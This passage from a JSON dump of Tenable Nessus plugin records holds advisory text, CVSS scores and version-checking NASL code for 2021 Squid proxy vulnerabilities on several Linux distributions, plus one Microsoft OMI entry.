audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"squid-3.5.20-2.2.h14\",\n \"squid-migration-script-3.5.20-2.2.h14\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"squid\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-03-09T15:26:17", "description": "The Microsoft Open Management 
Infrastructure service detected on the remote host is affected by a remote code execution vulnerability due to insufficient authentication validation. An unauthenticated, remote attacker can exploit this to execute code on the remote host as root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-20T00:00:00", "type": "nessus", "title": "Microsoft Open Management Infrastructure RCE (CVE-2021-38647)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2023-03-09T00:00:00", "cpe": ["x-cpe:/a:microsoft:open_management_infrastructure"], "id": "OMI_CVE-2021-38647.NBIN", "href": "https://www.tenable.com/plugins/nessus/153486", "sourceData": "Binary data omi_cve-2021-38647.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:52:31", "description": "An update of the squid package has been released.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": 
"NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-22T00:00:00", "type": "nessus", "title": "Photon OS 3.0: Squid PHSA-2021-3.0-0269", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28651", "CVE-2021-28652", "CVE-2021-31806", "CVE-2021-31807", "CVE-2021-31808", "CVE-2021-33620"], "modified": "2021-07-22T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:squid", "cpe:/o:vmware:photonos:3.0"], "id": "PHOTONOS_PHSA-2021-3_0-0269_SQUID.NASL", "href": "https://www.tenable.com/plugins/nessus/151955", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-3.0-0269. 
The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151955);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/22\");\n\n script_cve_id(\n \"CVE-2021-28651\",\n \"CVE-2021-28652\",\n \"CVE-2021-31806\",\n \"CVE-2021-31807\",\n \"CVE-2021-31808\",\n \"CVE-2021-33620\"\n );\n\n script_name(english:\"Photon OS 3.0: Squid PHSA-2021-3.0-0269\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the squid package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-3.0-269.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:squid\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:3.0\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 3\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 3.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'squid-4.16-1.ph3')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'squid');\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:50:18", "description": "Multiple denial of service vulnerabilities were discovered in the Squid proxy caching server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 
7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-03T00:00:00", "type": "nessus", "title": "Debian DSA-4924-1 : squid - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28651", "CVE-2021-28652", "CVE-2021-28662", "CVE-2021-31806", "CVE-2021-31807", "CVE-2021-31808"], "modified": "2021-06-17T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:squid", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4924.NASL", "href": "https://www.tenable.com/plugins/nessus/150165", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4924. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(150165);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/17\");\n\n script_cve_id(\"CVE-2021-28651\", \"CVE-2021-28652\", \"CVE-2021-28662\", \"CVE-2021-31806\", \"CVE-2021-31807\", \"CVE-2021-31808\");\n script_xref(name:\"DSA\", value:\"4924\");\n\n script_name(english:\"Debian DSA-4924-1 : squid - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Multiple denial of service vulnerabilities were discovered in the\nSquid proxy caching server.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=988891\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=988892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=988893\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=989043\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/squid\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/squid\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2021/dsa-4924\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the squid packages.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 4.6-1+deb10u6.\"\n );\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28651\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:squid\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"squid\", reference:\"4.6-1+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"squid-cgi\", reference:\"4.6-1+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"squid-common\", reference:\"4.6-1+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"squid-purge\", reference:\"4.6-1+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"squid3\", reference:\"4.6-1+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"squidclient\", reference:\"4.6-1+deb10u6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:49:47", "description": "Several vulnerabilities were discovered in Squid, a proxy caching server. \n\nCVE-2021-28651\n\nDue to a buffer-management bug, it allows a denial of service. When resolving a request with the urn: scheme, the parser leaks a small amount of memory. However, there is an unspecified attack methodology that can easily trigger a large amount of memory consumption.\n\nCVE-2021-28652\n\nDue to incorrect parser validation, it allows a Denial of Service attack against the Cache Manager API. This allows a trusted client to trigger memory leaks that. 
over time, lead to a Denial of Service via an unspecified short query string. This attack is limited to clients with Cache Manager API access privilege.\n\nCVE-2021-31806\n\nDue to a memory-management bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy) via HTTP Range request processing.\n\nCVE-2021-31807\n\nAn integer overflow problem allows a remote server to achieve Denial of Service when delivering responses to HTTP Range requests. The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent.\n\nCVE-2021-31808\n\nDue to an input-validation bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy). A client sends an HTTP Range request to trigger this.\n\nCVE-2021-33620\n\nRemote servers to cause a denial of service (affecting availability to all clients) via an HTTP response. The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent by the server.\n\nFor Debian 9 stretch, these problems have been fixed in version 3.5.23-5+deb9u7.\n\nWe recommend that you upgrade your squid3 packages.\n\nFor the detailed security status of squid3 please refer to its security tracker page at:\nhttps://security-tracker.debian.org/tracker/squid3\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-15T00:00:00", "type": "nessus", "title": "Debian DLA-2685-1 : squid3 security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28651", "CVE-2021-28652", "CVE-2021-31806", "CVE-2021-31807", "CVE-2021-31808", "CVE-2021-33620"], "modified": "2023-01-05T00:00:00", "cpe": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:squid:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:squid-common:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:squid-cgi:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:squid3:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:squidclient:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:squid-purge:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:squid-dbg:*:*:*:*:*:*:*"], "id": "DEBIAN_DLA-2685.NASL", "href": "https://www.tenable.com/plugins/nessus/150796", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this 
plugin were\n# extracted from Debian Security Advisory DLA-2685-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(150796);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/05\");\n\n script_cve_id(\"CVE-2021-28651\", \"CVE-2021-28652\", \"CVE-2021-31806\", \"CVE-2021-31807\", \"CVE-2021-31808\", \"CVE-2021-33620\");\n\n script_name(english:\"Debian DLA-2685-1 : squid3 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities were discovered in Squid, a proxy caching\nserver. \n\nCVE-2021-28651\n\nDue to a buffer-management bug, it allows a denial of service. When\nresolving a request with the urn: scheme, the parser leaks a small\namount of memory. However, there is an unspecified attack methodology\nthat can easily trigger a large amount of memory consumption.\n\nCVE-2021-28652\n\nDue to incorrect parser validation, it allows a Denial of Service\nattack against the Cache Manager API. This allows a trusted client to\ntrigger memory leaks that. over time, lead to a Denial of Service via\nan unspecified short query string. This attack is limited to clients\nwith Cache Manager API access privilege.\n\nCVE-2021-31806\n\nDue to a memory-management bug, it is vulnerable to a Denial of\nService attack (against all clients using the proxy) via HTTP Range\nrequest processing.\n\nCVE-2021-31807\n\nAn integer overflow problem allows a remote server to achieve Denial\nof Service when delivering responses to HTTP Range requests. 
The issue\ntrigger is a header that can be expected to exist in HTTP traffic\nwithout any malicious intent.\n\nCVE-2021-31808\n\nDue to an input-validation bug, it is vulnerable to a Denial of\nService attack (against all clients using the proxy). A client sends\nan HTTP Range request to trigger this.\n\nCVE-2021-33620\n\nRemote servers to cause a denial of service (affecting availability to\nall clients) via an HTTP response. The issue trigger is a header that\ncan be expected to exist in HTTP traffic without any malicious intent\nby the server.\n\nFor Debian 9 stretch, these problems have been fixed in version\n3.5.23-5+deb9u7.\n\nWe recommend that you upgrade your squid3 packages.\n\nFor the detailed security status of squid3 please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/squid3\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2021/06/msg00014.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/squid3\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/squid3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28651\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known 
exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:squid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:squid-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:squid-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:squid-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:squid-purge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:squid3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:squidclient\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"squid\", reference:\"3.5.23-5+deb9u7\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"squid-cgi\", reference:\"3.5.23-5+deb9u7\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"squid-common\", reference:\"3.5.23-5+deb9u7\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"squid-dbg\", reference:\"3.5.23-5+deb9u7\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"squid-purge\", reference:\"3.5.23-5+deb9u7\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"squid3\", reference:\"3.5.23-5+deb9u7\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"squidclient\", reference:\"3.5.23-5+deb9u7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:55:38", "description": "The remote Oracle Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the ELSA-2021-9465 advisory.\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a buffer-management bug, it allows a denial of service. When resolving a request with the urn: scheme, the parser leaks a small amount of memory. 
However, there is an unspecified attack methodology that can easily trigger a large amount of memory consumption. (CVE-2021-28651)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a memory-management bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy) via HTTP Range request processing. (CVE-2021-31806)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. An integer overflow problem allows a remote server to achieve Denial of Service when delivering responses to HTTP Range requests. The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent.\n (CVE-2021-31807)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to an input-validation bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy). A client sends an HTTP Range request to trigger this. (CVE-2021-31808)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to incorrect parser validation, it allows a Denial of Service attack against the Cache Manager API. This allows a trusted client to trigger memory leaks that. over time, lead to a Denial of Service via an unspecified short query string. This attack is limited to clients with Cache Manager API access privilege. (CVE-2021-28652)\n\n - Squid before 4.15 and 5.x before 5.0.6 allows remote servers to cause a denial of service (affecting availability to all clients) via an HTTP response. The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent by the server. 
(CVE-2021-33620)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-09-24T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : squid (ELSA-2021-9465)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28651", "CVE-2021-28652", "CVE-2021-31806", "CVE-2021-31807", "CVE-2021-31808", "CVE-2021-33620"], "modified": "2021-09-24T00:00:00", "cpe": ["cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:squid", "p-cpe:/a:oracle:linux:squid-migration-script", "p-cpe:/a:oracle:linux:squid-sysvinit"], "id": "ORACLELINUX_ELSA-2021-9465.NASL", "href": "https://www.tenable.com/plugins/nessus/153665", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2021-9465.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153665);\n script_version(\"1.2\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/09/24\");\n\n script_cve_id(\n \"CVE-2021-28651\",\n \"CVE-2021-28652\",\n \"CVE-2021-31806\",\n \"CVE-2021-31807\",\n \"CVE-2021-31808\",\n \"CVE-2021-33620\"\n );\n\n script_name(english:\"Oracle Linux 7 : squid (ELSA-2021-9465)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nELSA-2021-9465 advisory.\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a buffer-management bug, it\n allows a denial of service. When resolving a request with the urn: scheme, the parser leaks a small amount\n of memory. However, there is an unspecified attack methodology that can easily trigger a large amount of\n memory consumption. (CVE-2021-28651)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a memory-management bug, it is\n vulnerable to a Denial of Service attack (against all clients using the proxy) via HTTP Range request\n processing. (CVE-2021-31806)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. An integer overflow problem allows a\n remote server to achieve Denial of Service when delivering responses to HTTP Range requests. The issue\n trigger is a header that can be expected to exist in HTTP traffic without any malicious intent.\n (CVE-2021-31807)\n\n - An issue was discovered in Squid before 4.15 and 